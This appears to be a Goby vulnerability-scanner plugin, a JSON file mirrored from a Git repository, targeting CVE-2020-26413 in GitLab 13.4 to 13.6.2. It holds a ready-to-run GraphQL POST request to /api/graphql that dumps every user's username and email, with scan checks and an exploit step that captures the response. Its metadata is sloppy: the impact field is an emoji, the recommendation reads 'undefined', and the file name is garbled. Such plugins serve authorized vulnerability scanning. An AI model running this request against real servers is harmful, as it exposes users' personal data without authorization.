qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/GitLab Graphql╙╩╧Σ╨┼╧ó╨╣┬╢┬...

88 lines
3.6 KiB
JSON
Raw Blame History

{
"Name": "GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413",
"Level": "0",
"Tags": [
"信息泄露"
],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名",
"Product": "GitLab 13.4 - 13.6.2",
"Homepage": "https://about.gitlab.com/pricing/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"https://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/graphql",
"follow_redirect": true,
"header": {
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "username",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "email",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "@",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/graphql",
"follow_redirect": true,
"header": {
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-03-09 13:34:57",
"GobyVersion": "1.8.237"
}
Reference in New Issue View Git Blame Copy Permalink